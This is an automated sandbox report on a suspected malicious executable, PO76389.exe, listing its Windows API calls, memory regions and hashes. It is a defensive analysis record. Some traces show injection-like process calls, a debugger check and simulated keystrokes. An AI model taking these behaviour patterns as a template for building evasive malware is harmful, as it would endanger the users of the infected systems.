• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004FCC71,?,?,?,?,?,00000004), ref: 004FCFE1
• SetFileTime.KERNEL32(00000000,?,00000000,?,?,004FCC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004FCFF7
• CloseHandle.KERNEL32(00000000,?,004FCC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004FCFFE
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 004FC45E
  • Part of subcall function 004D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28DE
  • Part of subcall function 004D28CA: GetLastError.KERNEL32(00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28F0
• _free.LIBCMT ref: 004FC46F
• _free.LIBCMT ref: 004FC481
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: _memmove
• String ID: EA06
• API String ID: 4104443479-3962188686
APIs
• _memset.LIBCMT ref: 00523CF1
  • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
  • Part of subcall function 004B3A67: SHGetMalloc.SHELL32(1<K), ref: 004B3A7D
  • Part of subcall function 004B3A67: SHGetDesktopFolder.SHELL32(?), ref: 004B3A8F
  • Part of subcall function 004B3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 004B3AD2
  • Part of subcall function 004B3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,005722E8,?), ref: 004B3B65
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: Path$FullName$DesktopFolderFromListMalloc_memset
• String ID: X
• API String ID: 2727075218-3081909835
Strings
• >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 005234AA
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: LibraryLoad
• String ID: >>>AUTOIT NO CMDEXECUTE<<<
• API String ID: 1029625771-2684727018
                                                    APIs
                                                    • _memmove.LIBCMT ref: 004D367B
                                                    • __flush.LIBCMT ref: 004D369B
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: __flush__getptd_noexit_memmove
                                                    • String ID:
                                                    • API String ID: 3662107617-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    APIs
                                                    • 745AC8D0.UXTHEME ref: 004B36E6
                                                      • Part of subcall function 004D2025: __lock.LIBCMT ref: 004D202B
                                                      • Part of subcall function 004B32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004B32F6
                                                      • Part of subcall function 004B32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004B330B
                                                      • Part of subcall function 004B374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 004B376D
                                                      • Part of subcall function 004B374E: IsDebuggerPresent.KERNEL32(?,?), ref: 004B377F
                                                      • Part of subcall function 004B374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO76389.exe,00000104,?,00571120,C:\Users\user\Desktop\PO76389.exe,00571124,?,?), ref: 004B37EE
                                                      • Part of subcall function 004B374E: SetCurrentDirectoryW.KERNEL32(?), ref: 004B3860
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004B3726
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                    • String ID:
                                                    • API String ID: 3809921791-0
                                                    APIs
                                                    • ___lock_fhandle.LIBCMT ref: 004DF7D9
                                                    • __close_nolock.LIBCMT ref: 004DF7F2
                                                      • Part of subcall function 004D886A: __getptd_noexit.LIBCMT ref: 004D886A
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                    • String ID:
                                                    • API String ID: 1046115767-0
                                                    APIs
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    • __lock_file.LIBCMT ref: 004D42B9
                                                      • Part of subcall function 004D5A9F: __lock.LIBCMT ref: 004D5AC2
                                                    • __fclose_nolock.LIBCMT ref: 004D42C4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,00000000), ref: 00DA0DF3
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00DA0E89
                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00DA0EAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    APIs
                                                      • Part of subcall function 004B3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 004B3F90
                                                      • Part of subcall function 004D4129: __wfsopen.LIBCMT ref: 004D4134
                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004B34E2,?,00000001), ref: 004B3FCD
                                                      • Part of subcall function 004B3E78: FreeLibrary.KERNEL32(00000000), ref: 004B3EAB
                                                      • Part of subcall function 004B4010: _memmove.LIBCMT ref: 004B405A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    APIs
                                                    • ___lock_fhandle.LIBCMT ref: 004DBD73
                                                      • Part of subcall function 004D886A: __getptd_noexit.LIBCMT ref: 004D886A
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                    • String ID:
                                                    • API String ID: 1144279405-0
                                                    • Opcode ID: f1a148077adf7bf0b8ea669e44160400ece2551e31d482cdc7f9746e78b0c477
                                                    • Instruction ID: 3b4364eab8d493f529c13791309e847e88b0e4a359a00935a031e142bf18cdd7
                                                    • Opcode Fuzzy Hash: f1a148077adf7bf0b8ea669e44160400ece2551e31d482cdc7f9746e78b0c477
                                                    • Instruction Fuzzy Hash: 9411B232804614DFD7117F66D8623693662AF42339F56064BF5640F3E2DBBC4940ABAA
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 004D377D
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 285c1df8d0bf76dea6f827c48717cc8020eff6ea049a4a074e3ffd079d3a73c4
                                                    • Instruction ID: 4fcba929e44e5d36b4192c1645120ce9758772c9c60f31904e63f8c2619b13bf
                                                    • Opcode Fuzzy Hash: 285c1df8d0bf76dea6f827c48717cc8020eff6ea049a4a074e3ffd079d3a73c4
                                                    • Instruction Fuzzy Hash: CBF0C2B1500615AADF21AF758C1639F7660BF00315F40851BB4109A391E77C8B40DB8A
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,004B34E2,?,00000001), ref: 004B3E6D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 96306d7c2d3485bad7bceec25985f3030f5f63a9480ba26b5fffb8c86992ecd0
                                                    • Instruction ID: c94819905b692bea3f8df4d05bf5a2f75aa9d13b5fd2fad4247fb807e240827b
                                                    • Opcode Fuzzy Hash: 96306d7c2d3485bad7bceec25985f3030f5f63a9480ba26b5fffb8c86992ecd0
                                                    • Instruction Fuzzy Hash: 53F03971101741CFCB349F66D490997BBF0AF1471A3258A7FE5D682621C739D948DF24
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: d737acbc70da5eadef2b7d2cb617a21c535a8ef2b4ee69cd1fc28c820be5115a
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: 90B0927244030C77CE012A82EC06A493B19AB90764F008022FB0C18261A677AAA09A89
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction ID: b04b2b78bf6d0d3cc46ef008c3582b4731716c5d79bfca7ffba70bed543459ea
                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction Fuzzy Hash: BCE0BF7494020DEFDB00DFA8D5496DD7BB4EF05301F1005A1FD05D7680DB309E54CA66
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: c746a6470f0be7562711ab958e8b96f584202c2207b59d215ec58597a42939a7
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: 02E0BF7494020D9FDB00DFA8D54969D7BB4EF04301F100161FD01D2280D63099508A62
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0051F64E
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0051F6AD
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0051F6EA
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0051F711
                                                    • SendMessageW.USER32 ref: 0051F737
                                                    • _wcsncpy.LIBCMT ref: 0051F7A3
                                                    • GetKeyState.USER32(00000011), ref: 0051F7C4
                                                    • GetKeyState.USER32(00000009), ref: 0051F7D1
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0051F7E7
                                                    • GetKeyState.USER32(00000010), ref: 0051F7F1
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0051F820
                                                    • SendMessageW.USER32 ref: 0051F843
                                                    • SendMessageW.USER32(?,00001030,?,0051DE69), ref: 0051F940
                                                    • SetCapture.USER32(?), ref: 0051F970
                                                    • ClientToScreen.USER32(?,?), ref: 0051F9D4
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0051F9FA
                                                    • ReleaseCapture.USER32 ref: 0051FA05
                                                    • GetCursorPos.USER32(?), ref: 0051FA3A
                                                    • ScreenToClient.USER32(?,?), ref: 0051FA47
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0051FAA9
                                                    • SendMessageW.USER32 ref: 0051FAD3
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0051FB12
                                                    • SendMessageW.USER32 ref: 0051FB3D
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0051FB55
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0051FB60
                                                    • GetCursorPos.USER32(?), ref: 0051FB81
                                                    • ScreenToClient.USER32(?,?), ref: 0051FB8E
                                                    • GetParent.USER32(?), ref: 0051FBAA
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0051FC10
                                                    • SendMessageW.USER32 ref: 0051FC40
                                                    • ClientToScreen.USER32(?,?), ref: 0051FC96
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0051FCC2
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0051FCEA
                                                    • SendMessageW.USER32 ref: 0051FD0D
                                                    • ClientToScreen.USER32(?,?), ref: 0051FD57
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0051FD87
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0051FE1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3461372671-4164748364
                                                    • Opcode ID: 76afc723ad557376dacc7777b58da65aae7dc2e27cef33ad464681743e44dd71
                                                    • Instruction ID: 81b9797078338b633a23fbbfba418ff6e6dfd74eed8dfa0b78f905f76eda2303
                                                    • Opcode Fuzzy Hash: 76afc723ad557376dacc7777b58da65aae7dc2e27cef33ad464681743e44dd71
                                                    • Instruction Fuzzy Hash: 44328C71204201AFE710DF68D884AAABFF9FF48358F140A29F6A6872B1D731DC95DB51
                                                    APIs
                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0051AFDB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 3850602802-328681919
                                                    • Opcode ID: 23e0a7e7d1d9cae485d990a25b14272dee97c12db72a6a3e8cc101eacdf69c9b
                                                    • Instruction ID: 060c2d181d76e01ecceae61ec3f5d21db80eebe5b011bc33a9dbe3dd1c528915
                                                    • Opcode Fuzzy Hash: 23e0a7e7d1d9cae485d990a25b14272dee97c12db72a6a3e8cc101eacdf69c9b
                                                    • Instruction Fuzzy Hash: 8012DEB1601204ABEB268F65DC49FEE7FB8FF45310F10421AF51ADB291DB748985DB22
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 004CF796
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00524388
                                                    • IsIconic.USER32(000000FF), ref: 00524391
                                                    • ShowWindow.USER32(000000FF,00000009), ref: 0052439E
                                                    • SetForegroundWindow.USER32(000000FF), ref: 005243A8
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005243BE
                                                    • GetCurrentThreadId.KERNEL32 ref: 005243C5
                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 005243D1
                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005243E2
                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005243EA
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 005243F2
                                                    • SetForegroundWindow.USER32(000000FF), ref: 005243F5
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052440A
                                                    • keybd_event.USER32(00000012,00000000), ref: 00524415
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052441F
                                                    • keybd_event.USER32(00000012,00000000), ref: 00524424
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052442D
                                                    • keybd_event.USER32(00000012,00000000), ref: 00524432
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052443C
                                                    • keybd_event.USER32(00000012,00000000), ref: 00524441
                                                    • SetForegroundWindow.USER32(000000FF), ref: 00524444
                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0052446B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: 9ed413487e357585987da2afdb63d64177fdfee9bae8c8b31c11ecddba374191
